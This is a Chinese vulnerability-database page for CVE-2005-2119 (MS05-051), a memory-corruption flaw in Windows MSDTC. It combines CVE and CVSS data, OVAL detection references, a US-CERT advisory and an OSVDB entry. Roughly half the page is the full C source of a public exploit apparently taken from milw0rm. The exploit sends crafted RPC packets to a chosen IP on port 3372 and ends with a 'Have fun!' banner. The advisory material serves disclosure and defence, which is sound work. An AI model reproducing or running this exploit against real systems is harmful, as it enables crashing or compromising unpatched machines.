CVE-2005-2119 |
|
发布时间 :2005-10-12 09:04:00 | ||
修订时间 :2008-09-10 15:41:06 | ||||
NMCOEPS |
[原文]The MIDL_user_allocate function in the Microsoft Distributed Transaction Coordinator (MSDTC) proxy (MSDTCPRX.DLL) allocates a 4K page of memory regardless of the required size, which allows attackers to overwrite arbitrary memory locations using an incorrect size value that is provided to the NdrAllocate function, which writes management data to memory outside of the allocated buffer.
[CNNVD]Microsoft Windows MSDTC内存破坏漏洞(MS05-051)(CNNVD-200510-066)
Microsoft 分布式事务处理协调器中的MIDL_user_allocate 函数分配4k页内存,攻击者可以通过提供给NdrAllocate函数的不正确的值去覆盖任意的内存位置而执行恶意代码。
Microsoft Windows是微软发布的非常流行的操作系统,Microsoft分布式事务处理协调器(MSDTC)是Microsoft Windows 平台的一个分布式事务处理设备。
Microsoft Windows MSDTC处理用户请求存在漏洞,允许远程攻击者在任意内存地址写入有限有限的数据字节,成功利用此漏洞可以在一些Windows系统上执行任意指令,从而完全控制系统。
在Windows 2000上,这是一个远程执行代码漏洞。在Windows XP Service Pack 1和Windows Server 2003上,这是一个本地特权提升漏洞。 在Windows XP Service Pack 1上,如果启动了Microsoft MSDTC,这还会变为一个远程执行代码漏洞。
- CVSS (基础分值)
CVSS分值: | 5 | [中等(MEDIUM)] |
机密性影响: | NONE | [对系统的机密性无影响] |
完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
可用性影响: | NONE | [对系统可用性无影响] |
攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
攻击向量: | [--] | |
身份认证: | NONE | [漏洞利用无需身份认证] |
- CPE (受影响的平台与产品)
cpe:/o:microsoft:windows_xp::sp2:tablet_pc | Microsoft windows xp_sp2 tablet_pc |
cpe:/o:microsoft:windows_2003_server:r2 | |
cpe:/o:microsoft:windows_2003_server:itanium | |
cpe:/o:microsoft:windows_2000::sp4::fr | |
cpe:/o:microsoft:windows_2003_server:sp1::itanium | |
cpe:/o:microsoft:windows_2003_server:sp1 | |
cpe:/o:microsoft:windows_2003_server:64-bit | |
cpe:/o:microsoft:windows_xp:::64-bit | |
cpe:/o:microsoft:windows_xp::sp1:tablet_pc | Microsoft windows xp_sp1 tablet_pc |
- OVAL (用于检测的技术细节)
oval:org.mitre.oval:def:551 | MSDTC Unchecked Buffer Permits Remote Code Execution or Privilege Elevation (Win2k,SP4) |
oval:org.mitre.oval:def:1452 | MSDTC Unchecked Buffer Permits Remote Code Execution or Privilege Elevation (Server 2003) |
oval:org.mitre.oval:def:1071 | MSDTC Unchecked Buffer Permits Remote Code Execution or Privilege Elevation (WinXP,SP1) |
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。 |
- 官方数据库链接
- 其它链接及资源
http://www.us-cert.gov/cas/techalerts/TA05-284A.html (UNKNOWN) CERT TA05-284A |
http://www.kb.cert.org/vuls/id/180868 (UNKNOWN) CERT-VN VU#180868 |
http://www.microsoft.com/technet/security/bulletin/MS05-051.mspx (VENDOR_ADVISORY) MS MS05-051 |
http://www.osvdb.org/18828 (UNKNOWN) OSVDB 18828 |
http://www.securityfocus.com/bid/15056 (UNKNOWN) BID 15056 |
http://www.eeye.com/html/research/advisories/AD20051011b.html (UNKNOWN) EEYE AD20051011b |
http://support.avaya.com/elmodocs2/security/ASA-2005-214.pdf (UNKNOWN) CONFIRM http://support.avaya.com/elmodocs2/security/ASA-2005-214.pdf |
http://securitytracker.com/id?1015037 (UNKNOWN) SECTRACK 1015037 |
http://securityreason.com/securityalert/73 (UNKNOWN) SREASON 73 |
http://secunia.com/advisories/17509 (UNKNOWN) SECUNIA 17509 |
http://secunia.com/advisories/17223 (UNKNOWN) SECUNIA 17223 |
http://secunia.com/advisories/17172 (UNKNOWN) SECUNIA 17172 |
http://secunia.com/advisories/17161 (UNKNOWN) SECUNIA 17161 |
- 漏洞信息
Microsoft Windows MSDTC内存破坏漏洞(MS05-051) | |
中危 | 边界条件错误 |
2005-10-12 00:00:00 | 2005-10-20 00:00:00 |
远程※本地 | |
Microsoft 分布式事务处理协调器中的MIDL_user_allocate 函数分配4k页内存,攻击者可以通过提供给NdrAllocate函数的不正确的值去覆盖任意的内存位置而执行恶意代码。
Microsoft Windows是微软发布的非常流行的操作系统,Microsoft分布式事务处理协调器(MSDTC)是Microsoft Windows 平台的一个分布式事务处理设备。 Microsoft Windows MSDTC处理用户请求存在漏洞,允许远程攻击者在任意内存地址写入有限有限的数据字节,成功利用此漏洞可以在一些Windows系统上执行任意指令,从而完全控制系统。 在Windows 2000上,这是一个远程执行代码漏洞。在Windows XP Service Pack 1和Windows Server 2003上,这是一个本地特权提升漏洞。 在Windows XP Service Pack 1上,如果启动了Microsoft MSDTC,这还会变为一个远程执行代码漏洞。 |
- 公告与补丁
暂无数据 |
- 漏洞信息 (1341)
MS Windows MSDTC Service Remote Memory Modification PoC (MS05-051) (EDBID:1341) | |
windows | dos |
2005-11-27 | Verified |
0 | darkeagle |
N/A | [点击下载] |
/* \ MSDTC remote PoC exploit / by Darkeagle \ / \ Unl0ck Research Team / \ / Greetingz: all UKT boys, 0x557 guys, Sowhat, GHC/RST guys \ / Exploit tested on: Windows 2000 Professional Russian Service Pack 4 \ / http://exploiterz.org || http://55k7.org \ / Reference: http://security.nnov.ru/Jdocument906.html \ / ."by default on all Windows 2000 systems." \ it's false: by default in my system msdtc service turned off. */ #include <stdio.h> #include <string.h> #include <winsock.h> #include <windows.h> unsigned char packet1[] = "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00" "\x00\x00\x01\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00" "\x00\x00\x00\x00\x01\x00\xe0\x0c\x6b\x90\x0b\xc7\x67\x10\xb3\x17" "\x00\xdd\x01\x06\x62\xda\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c" "\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00"; unsigned char packet2[] = "\x05\x00\x00\x03\x10\x00\x00\x00\x04\x01" "\x00\x00\x01\x00\x00\x00\xec\x00\x00\x00\x00\x00\x07\x00" "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00\x00\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00\x55\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00" "\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00\x90\x00"; int banner (char *proga) { system("cls"); printf("** MSDTC remote PoC Exploit **\n"); printf(" by Darkeagle \n"); printf("\nUse: %s <ip> <port>\n", proga); printf("Default port: 3372\n"); printf("Have fun!\n"); } int main ( int argc, char *argv[] ) { SOCKET sock; WSADATA wsa; struct sockaddr_in addr; int port; char *ip_addr; if ( argc < 3 ) { banner(argv[0]); exit(0); } banner(argv[0]); port = atoi(argv[2]); ip_addr = argv[1]; printf("[] preparing..\n"); WSAStartup(MAKEWORD(2,0), &wsa); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = inet_addr(ip_addr); printf("[] connecting..\n"); if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1 ) { printf("[-] connection failed!\n"); exit(0); } printf("[] sending crafted packet..."); if ( send(sock, packet1, sizeof(packet1), 0) == -1 ) { printf("[-] send failed!\n"); exit(0); } if ( send(sock, packet2, sizeof(packet2), 0) == -1 ) { printf("[-] send failed!\n"); exit(0); } printf("ok!\n"); closesocket(sock); WSACleanup(); return 0; } // milw0rm.com [2005-11-27]
- 漏洞信息 (F40619)
Technical Cyber Security Alert 2005-284A (PacketStormID:F40619) |
2005-10-12 00:00:00 |
US-CERT cert.org |
advisory,remote,denial of service,arbitrary,vulnerability |
windows |
CVE-2005-2120,CVE-2005-1987,CVE-2005-2122,CVE-2005-2128,CVE-2005-2119,CVE-2005-1978,CVE-2005-2127,CVE-2005-0163 |
[点击下载] |
Microsoft has released updates that address critical vulnerabilities in Windows, Internet Explorer, and Exchange Server. Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service on an affected system. |
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Technical Cyber Security Alert TA05-284A Microsoft Windows, Internet Explorer, and Exchange Server Vulnerabilities Original release date: October 11, 2005 Last revised: -- Source: US-CERT Systems Affected * Microsoft Windows * Microsoft Internet Explorer * Microsoft Exchange Server For more complete information, refer to the Microsoft Security Bulletin Summary for October 2005. Overview Microsoft has released updates that address critical vulnerabilities in Windows, Internet Explorer, and Exchange Server. Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service on an affected system. I. Description Microsoft Security Bulletins for October 2005 address vulnerabilities in Windows and Internet Explorer. Further information is available in the following US-CERT Vulnerability Notes: VU#214572 - Microsoft Plug and Play fails to properly validate user supplied data Microsoft Plug and Play contains a flaw in the handling of message buffers that may result in local or remote arbitrary code execution or denial-of-service conditions. (CAN-2005-2120) VU#883460 - Microsoft Collaboration Data Objects buffer overflow A buffer overflow in Microsoft Collaboration Data Objects may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. (CAN-2005-1987) VU#922708 - Microsoft Windows Shell fails to handle shortcut files properly Microsoft Windows Shell does not properly handle some shortcut files and may permit arbitrary code execution when a specially-crafted file is opened. (CAN-2005-2122) VU#995220 - Microsoft DirectShow buffer overflow A buffer overflow in Microsoft DirectShow may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. (CAN-2005-2128) VU#180868 - Microsoft Distributed Transaction Coordinator vulnerable to buffer overflow via specially crafted network message Microsoft Distributed Transaction Coordinator (MSDTC) may be vulnerable to a flaw that allows remote, unauthenticated attackers to execute arbitrary code. (CAN-2005-2119) VU#950516 - Microsoft COM+ contains a memory management flaw Microsoft COM+ contains a vulnerability due to a memory management flaw that may allow an attacker to take complete control of an affected system. (CAN-2005-1978) VU#959049 - Several COM objects cause memory corruption in Microsoft Internet Explorer Microsoft Internet Explorer will initialize COM objects that were not intended to be used in the web browser. Several COM objects have been identified that may allow an attacker to execute arbitrary code or crash Internet Explorer. (CAN-2005-2127) VU#680526 - Microsoft Internet Explorer allows non-ActiveX COM objects to be instantiated Microsoft Internet Explorer will initialize COM objects that were not intended to be used in the web browser. This may allow an attacker to execute arbitrary code or crash Internet Explorer. (CAN-2005-0163) II. Impact Exploitation of these vulnerabilities may allow a remote, unauthenticated attacker to execute arbitrary code with SYSTEM privileges or with the privileges of the user. If the user is logged on with administrative privileges, the attacker could take complete control of an affected system. An attacker may also be able to cause a denial of service. III. Solution Apply Updates Microsoft has provided the updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site. Workarounds Please see the following US-CERT Vulnerability Notes for workarounds. Appendix A. References * Microsoft Security Bulletin Summary for October 2005 - <http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx> * US-CERT Vulnerability Note VU#214572 - <http://www.kb.cert.org/vuls/id/214572> * US-CERT Vulnerability Note VU#883460 - <http://www.kb.cert.org/vuls/id/883460> * US-CERT Vulnerability Note VU#922708 - <http://www.kb.cert.org/vuls/id/922708> * US-CERT Vulnerability Note VU#995220 - <http://www.kb.cert.org/vuls/id/995220> * US-CERT Vulnerability Note VU#180868 - <http://www.kb.cert.org/vuls/id/180868> * US-CERT Vulnerability Note VU#950516 - <http://www.kb.cert.org/vuls/id/950516> * US-CERT Vulnerability Note VU#959049 - <http://www.kb.cert.org/vuls/id/959049> * US-CERT Vulnerability Note VU#680526 - <http://www.kb.cert.org/vuls/id/680526> * CAN-2005-2120 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120> * CAN-2005-1987 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987> * CAN-2005-2122 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122> * CAN-2005-2128 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128> * CAN-2005-2119 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119> * CAN-2005-1978 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978> * CAN-2005-2127 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127> * CAN-2005-0163 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163> * Microsoft Update - <https://update.microsoft.com/microsoftupdate> _________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA05-284A.html> _________________________________________________________________ Feedback can be directed to US-CERT. Please send email to: <cert@cert.org> with "TA05-284A Feedback VU#959049" in the subject. _________________________________________________________________ Revision History Oct 11, 2004: Initial release _________________________________________________________________ Produced 2005 by US-CERT, a government organization. Terms of use <http://www.us-cert.gov/legal.html> _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/>. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc bqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK PdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c 1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe /9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM MUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog== =5hXu -----END PGP SIGNATURE-----
- 漏洞信息
18828 | |
Microsoft Windows Distributed Transaction Coordinator (DTC) Memory Modification Remote Code Execution | |
Remote / Network Access | |
Loss of Integrity | |
Exploit Public | Vendor Verified |
- 漏洞描述
Microsoft Windows contains a flaw that may allow a remote attacker to gain privileges. The issue is due to the MIDL_user_allocate function in the Microsoft Distributed Transaction Coordinator (MSDTC) proxy (MSDTCPRX.DLL) allocating a 4K page of memory regardless of the required size, which allows an attacker to overwrite arbitrary memory locations using an incorrect size value that is provided to the NdrAllocate function, which writes management data to memory outside of the allocated buffer. |
- 时间线
2005-10-11 | Unknow |
2005-11-25 | 2005-10-11 |